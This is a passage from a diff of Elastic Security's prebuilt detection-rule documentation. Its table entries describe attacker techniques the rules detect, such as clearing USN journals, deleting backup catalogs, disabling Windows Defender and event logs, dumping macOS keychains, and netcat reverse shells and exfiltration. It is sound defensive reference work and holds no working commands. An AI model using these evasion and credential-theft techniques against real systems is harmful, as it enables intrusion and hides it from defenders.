Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<delete-volume-usn-journal-with-fsutil, Delete Volume USN Journal with Fsutil>> |Identifies use of the fsutil.exe to delete the volume USNJRNL. This technique is used by attackers to eliminate evidence of files created during post-exploitation activities. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<deprecated-potential-dns-tunneling-via-iodine, Deprecated - Potential DNS Tunneling via Iodine>> |Iodine is a tool for tunneling Internet protocol version 4 (IPV4) traffic over the DNS protocol to circumvent firewalls, network security groups, and network access lists while evading detection. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<deleting-backup-catalogs-with-wbadmin, Deleting Backup Catalogs with Wbadmin>> |Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<deprecated-potential-process-injection-via-ld-preload-environment-variable, Deprecated - Potential Process Injection via LD_PRELOAD Environment Variable>> |This rule detects the execution of a process where the LD_PRELOAD environment variable is set. LD_PRELOAD can be used to inject a shared library into a binary at or prior to execution. A threat actor may do this in order to load a malicious shared library for the purposes of persistence, privilege escalation, and defense evasion. This activity is not common and will potentially indicate malicious or suspicious behavior. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.6.0 |3 +|<<deprecated-potential-reverse-shell-via-suspicious-parent-process, Deprecated - Potential Reverse Shell via Suspicious Parent Process>> |This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |5 |<<direct-outbound-smb-connection, Direct Outbound SMB Connection>> |Identifies unexpected processes making network connections over port 445. Windows File Sharing is typically implemented over Server Message Block (SMB), which communicates between hosts using port 445. When legitimate, these network connections are established by the kernel. Processes making 445/tcp connections may be port scanners, exploits, or suspicious user-level processes moving laterally. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<disable-windows-event-and-security-logs-using-built-in-tools, Disable Windows Event and Security Logs Using Built-in Tools>> |Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<disable-windows-event-and-security-logs-using-built-in-tools, Disable Windows Event and Security Logs Using Built-in Tools>> |Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<disable-windows-firewall-rules-via-netsh, Disable Windows Firewall Rules via Netsh>> |Identifies use of the netsh.exe to disable or weaken the local firewall. Attackers will use this command line tool to disable the firewall during troubleshooting or to enable network mobility. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 -|<<disabling-user-account-control-via-registry-modification, Disabling User Account Control via Registry Modification>> |User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<disabling-user-account-control-via-registry-modification, Disabling User Account Control via Registry Modification>> |User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<disabling-windows-defender-security-settings-via-powershell, Disabling Windows Defender Security Settings via PowerShell>> |Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<disabling-windows-defender-security-settings-via-powershell, Disabling Windows Defender Security Settings via PowerShell>> |Identifies use of the Set-MpPreference PowerShell command to disable or weaken certain Windows Defender settings. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 |<<discovery-of-domain-groups, Discovery of Domain Groups>> |Identifies the execution of Linux built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 @@ -444,13 +446,13 @@ and their rule type is `machine_learning`. |<<dumping-of-keychain-content-via-security-command, Dumping of Keychain Content via Security Command>> |Adversaries may dump the content of the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<dynamic-linker-copy, Dynamic Linker Copy>> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend] |8.3.0 |104 +|<<dynamic-linker-copy, Dynamic Linker Copy>> |Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Threat: Orbit], [Data Source: Elastic Defend] |8.3.0 |105 -|<<esxi-discovery-via-find, ESXI Discovery via Find>> |Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |3 +|<<esxi-discovery-via-find, ESXI Discovery via Find>> |Identifies instances where the 'find' command is started on a Linux system with arguments targeting specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the find command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |4 -|<<esxi-discovery-via-grep, ESXI Discovery via Grep>> |Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |3 +|<<esxi-discovery-via-grep, ESXI Discovery via Grep>> |Identifies instances where a process named 'grep', 'egrep', or 'pgrep' is started on a Linux system with arguments related to virtual machine (VM) files, such as "vmdk", "vmx", "vmxf", "vmsd", "vmsn", "vswp", "vmss", "nvram", or "vmem". These file extensions are associated with VM-related file formats, and their presence in grep command arguments may indicate that a threat actor is attempting to search for, analyze, or manipulate VM files on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.5.0 |4 -|<<esxi-timestomping-using-touch-command, ESXI Timestomping using Touch Command>> |Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |3 +|<<esxi-timestomping-using-touch-command, ESXI Timestomping using Touch Command>> |Identifies instances where the 'touch' command is executed on a Linux system with the "-r" flag, which is used to modify the timestamp of a file based on another file's timestamp. The rule targets specific VM-related paths, such as "/etc/vmware/", "/usr/lib/vmware/", or "/vmfs/*". These paths are associated with VMware virtualization software, and their presence in the touch command arguments may indicate that a threat actor is attempting to tamper with timestamps of VM-related files and configurations on the system. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.5.0 |4 |<<eggshell-backdoor-execution, EggShell Backdoor Execution>> |Identifies the execution of and EggShell Backdoor. EggShell is a known post exploitation tool for macOS and Linux. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |103 @@ -462,7 +464,7 @@ and their rule type is `machine_learning`. |<<encoded-executable-stored-in-the-registry, Encoded Executable Stored in the Registry>> |Identifies registry write modifications to hide an encoded portable executable. This could be indicative of adversary defense evasion by avoiding the storing of malicious content directly on disk. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<encrypting-files-with-winrar-or-7z, Encrypting Files with WinRar or 7z>> |Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<encrypting-files-with-winrar-or-7z, Encrypting Files with WinRar or 7z>> |Identifies use of WinRar or 7z to create an encrypted files. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<endpoint-security, Endpoint Security>> |Generates a detection alert each time an Elastic Endpoint Security alert is received. Enabling this rule allows you to immediately begin investigating your Endpoint alerts. |[Data Source: Elastic Defend] |8.3.0 |102 @@ -474,20 +476,24 @@ and their rule type is `machine_learning`. |<<enumeration-of-administrator-accounts, Enumeration of Administrator Accounts>> |Identifies instances of lower privilege accounts enumerating Administrator accounts or groups using built-in Windows tools. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 -|<<enumeration-of-kernel-modules, Enumeration of Kernel Modules>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.6.0 |205 +|<<enumeration-of-kernel-modules, Enumeration of Kernel Modules>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.6.0 |206 -|<<enumeration-of-kernel-modules-via-proc, Enumeration of Kernel Modules via Proc>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.3.0 |3 +|<<enumeration-of-kernel-modules-via-proc, Enumeration of Kernel Modules via Proc>> |Loadable Kernel Modules (or LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This identifies attempts to enumerate information about a kernel module using the /proc/modules filesystem. This filesystem is used by utilities such as lsmod and kmod to list the available kernel modules. |[OS: Linux], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR] |8.6.0 |103 |<<enumeration-of-privileged-local-groups-membership, Enumeration of Privileged Local Groups Membership>> |Identifies instances of an unusual process enumerating built-in Windows privileged local groups membership like Administrators or Remote Desktop users. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide] |8.6.0 |208 |<<enumeration-of-users-or-groups-via-built-in-commands, Enumeration of Users or Groups via Built-in Commands>> |Identifies the execution of macOS built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Data Source: Elastic Defend] |8.3.0 |104 -|<<exchange-mailbox-export-via-powershell, Exchange Mailbox Export via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |5 +|<<exchange-mailbox-export-via-powershell, Exchange Mailbox Export via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: PowerShell Logs] |8.3.0 |6 |<<executable-file-creation-with-multiple-extensions, Executable File Creation with Multiple Extensions>> |Masquerading can allow an adversary to evade defenses and better blend in with the environment. One way it occurs is when the name or location of a file is manipulated as a means of tricking a user into executing what they think is a benign file type but is actually executable code. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<executable-file-with-unusual-extension, Executable File with Unusual Extension>> |Identifies the creation or modification of an executable file with an unexpected file extension. Attackers may attempt to evade detection by masquerading files using the file extension values used by image, audio, or document file types. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + |<<execution-from-unusual-directory-command-line, Execution from Unusual Directory - Command Line>> |Identifies process execution from suspicious default Windows directories. This may be abused by adversaries to hide malware in trusted paths. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 +|<<execution-from-a-removable-media-with-network-connection, Execution from a Removable Media with Network Connection>> |Identifies process execution from a removable media and by an unusual process. Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Initial Access], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + |<<execution-of-com-object-via-xwizard, Execution of COM object via Xwizard>> |Windows Component Object Model (COM) is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects or executable code. Xwizard can be used to run a COM object created in registry to evade defensive counter measures. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<execution-of-file-written-or-modified-by-microsoft-office, Execution of File Written or Modified by Microsoft Office>> |Identifies an executable created by a Microsoft Office application and subsequently executed. These processes are often launched via scripts inside documents or during exploitation of Microsoft Office applications. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 @@ -496,13 +502,17 @@ and their rule type is `machine_learning`. |<<execution-of-persistent-suspicious-program, Execution of Persistent Suspicious Program>> |Identifies execution of suspicious persistent programs (scripts, rundll32, etc.) by looking at process lineage and command line usage. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 -|<<execution-of-an-unsigned-service, Execution of an Unsigned Service>> |This rule identifies the execution of unsigned executables via service control manager (SCM). Adversaries may abuse SCM to execute malware or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Rule Type: BBR], [Data Source: Elastic Defend] |8.6.0 |102 +|<<execution-of-an-unsigned-service, Execution of an Unsigned Service>> |This rule identifies the execution of unsigned executables via service control manager (SCM). Adversaries may abuse SCM to execute malware or escalate privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.6.0 |103 |<<execution-via-electron-child-process-node-js-module, Execution via Electron Child Process Node.js Module>> |Identifies attempts to execute a child process from within the context of an Electron application using the child_process Node.js module. Adversaries may abuse this technique to inherit permissions from parent processes. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |104 -|<<execution-via-mssql-xp-cmdshell-stored-procedure, Execution via MSSQL xp_cmdshell Stored Procedure>> |Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<execution-via-ms-visualstudio-pre-post-build-events, Execution via MS VisualStudio Pre/Post Build Events>> |Identifies the execution of a command via Microsoft Visual Studio Pre or Post build events. Adversaries may backdoor a trusted visual studio project to execute a malicious command during the project build process. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Execution], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + +|<<execution-via-mssql-xp-cmdshell-stored-procedure, Execution via MSSQL xp_cmdshell Stored Procedure>> |Identifies execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default, thus, it's important to review the context of it's use. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<execution-via-tsclient-mountpoint, Execution via TSClient Mountpoint>> |Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |105 +|<<execution-via-microsoft-dotnet-clickonce-host, Execution via Microsoft DotNet ClickOnce Host>> |Identifies the execution of DotNet ClickOnce installer via Dfsvc.exe trampoline. Adversaries may take advantage of ClickOnce to proxy execution of malicious payloads via trusted Microsoft processes. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |1 + +|<<execution-via-tsclient-mountpoint, Execution via TSClient Mountpoint>> |Identifies execution from the Remote Desktop Protocol (RDP) shared mountpoint tsclient on the target host. This may indicate a lateral movement attempt. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Lateral Movement], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 |<<execution-via-windows-subsystem-for-linux, Execution via Windows Subsystem for Linux>> |Detects attempts to execute a program on the host from the Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |4 @@ -510,13 +520,13 @@ and their rule type is `machine_learning`. |<<execution-with-explicit-credentials-via-scripting, Execution with Explicit Credentials via Scripting>> |Identifies execution of the security_authtrampoline process via a scripting interpreter. This occurs when programs use AuthorizationExecute-WithPrivileges from the Security.framework to run another program with root privileges. It should not be run by itself, as this is a sign of execution with explicit logon credentials. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Data Source: Elastic Defend] |8.3.0 |104 -|<<expired-or-revoked-driver-loaded, Expired or Revoked Driver Loaded>> |Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 +|<<expired-or-revoked-driver-loaded, Expired or Revoked Driver Loaded>> |Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Privilege Escalation], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |3 |<<exploit-detected-elastic-endgame, Exploit - Detected - Elastic Endgame>> |Elastic Endgame detected an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation] |8.3.0 |101 |<<exploit-prevented-elastic-endgame, Exploit - Prevented - Elastic Endgame>> |Elastic Endgame prevented an Exploit. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information. |[Data Source: Elastic Endgame], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation] |8.3.0 |101 -|<<exporting-exchange-mailbox-via-powershell, Exporting Exchange Mailbox via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 +|<<exporting-exchange-mailbox-via-powershell, Exporting Exchange Mailbox via PowerShell>> |Identifies the use of the Exchange PowerShell cmdlet, New-MailBoxExportRequest, to export the contents of a primary mailbox or archive to a .pst file. Adversaries may target user email to collect sensitive information. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |108 |<<external-alerts, External Alerts>> |Generates a detection alert for each external alert written to the configured indices. Enabling this rule allows you to immediately begin investigating external alerts in the app. |[OS: Windows], [Data Source: APM], [OS: macOS], [OS: Linux] |8.3.0 |102 @@ -528,21 +538,21 @@ and their rule type is `machine_learning`. |<<file-creation-time-changed, File Creation Time Changed>> |Identifies modification of a file creation time. Adversaries may modify file time attributes to blend malicious content with existing files. Timestomping is a technique that modifies the timestamps of a file often to mimic files that are in trusted directories. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion] |8.3.0 |3 -|<<file-creation-execution-and-self-deletion-in-suspicious-directory, File Creation, Execution and Self-Deletion in Suspicious Directory>> |This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |1 +|<<file-creation-execution-and-self-deletion-in-suspicious-directory, File Creation, Execution and Self-Deletion in Suspicious Directory>> |This rule monitors for the creation of a file, followed by its execution and self-deletion in a short timespan within a directory often used for malicious purposes by threat actors. This behavior is often used by malware to execute malicious code and delete itself to hide its tracks. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Data Source: Elastic Defend] |8.3.0 |2 -|<<file-deletion-via-shred, File Deletion via Shred>> |Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<file-deletion-via-shred, File Deletion via Shred>> |Malware or other files dropped or created on a system by an adversary may leave traces behind as to what was done within a network and how. Adversaries may remove these files over the course of an intrusion to keep their footprint low or remove them at the end as part of the post-intrusion cleanup process. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |106 |<<file-made-executable-via-chmod-inside-a-container, File Made Executable via Chmod Inside A Container>> |This rule detects when chmod is used to add the execute permission to a file inside a container. Modifying file permissions to make a file executable could indicate malicious activity, as an attacker may attempt to run unauthorized or malicious code inside the container. |[Data Source: Elastic Defend for Containers], [Domain: Container], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Defense Evasion] |8.8.0 |2 -|<<file-permission-modification-in-writable-directory, File Permission Modification in Writable Directory>> |Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.3.0 |105 +|<<file-permission-modification-in-writable-directory, File Permission Modification in Writable Directory>> |Identifies file permission modifications in common writable directories by a non-root user. Adversaries often drop files or payloads into a writable directory and change permissions prior to execution. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Defend] |8.6.0 |206 -|<<file-staged-in-root-folder-of-recycle-bin, File Staged in Root Folder of Recycle Bin>> |Identifies files written to the root of the Recycle Bin folder instead of subdirectories. Adversaries may place files in the root of the Recycle Bin in preparation for exfiltration or to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 +|<<file-staged-in-root-folder-of-recycle-bin, File Staged in Root Folder of Recycle Bin>> |Identifies files written to the root of the Recycle Bin folder instead of subdirectories. Adversaries may place files in the root of the Recycle Bin in preparation for exfiltration or to evade defenses. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |2 -|<<file-transfer-or-listener-established-via-netcat, File Transfer or Listener Established via Netcat>> |A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 +|<<file-transfer-or-listener-established-via-netcat, File Transfer or Listener Established via Netcat>> |A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 